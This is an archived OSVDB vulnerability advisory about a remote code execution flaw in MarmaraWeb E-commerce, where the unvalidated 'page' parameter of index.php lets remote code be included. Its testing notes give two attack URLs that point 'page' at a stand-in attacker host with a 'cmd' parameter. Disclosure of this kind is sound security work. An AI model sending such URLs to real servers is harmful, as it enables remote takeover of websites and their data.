MarmaraWeb E-commerce index.php page Variable Arbitrary Command Execution

2005-12-15T18:17:46
ID OSVDB:21903
Type osvdb
Reporter B3g0k(B3g0k@hackermail.com)
Modified 2005-12-15T18:17:46

Description

Vulnerability Description

MarmaraWeb E-commerce contains a flaw that allows a remote arbitrary code execution attack. This flaw exists because the application does not validate the 'page' variable upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

MarmaraWeb E-commerce contains a flaw that allows a remote arbitrary code execution attack. This flaw exists because the application does not validate the 'page' variable upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code, leading to a loss of integrity.

Manual Testing Notes

http://[target]/index.php?page=http://yourevilcode?&cmd= http://[target]/?page=http://yourevilcode?&cmd=

References:

Vendor URL: http://www.marmaraweb.com/referanslar.php#eticaret Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0185.html Generic Exploit URL: http://packetstormsecurity.org/0512-exploits/marmaraXSS.txt CVE-2005-4287 Bugtraq ID: 15875 Bugtraq ID: 15877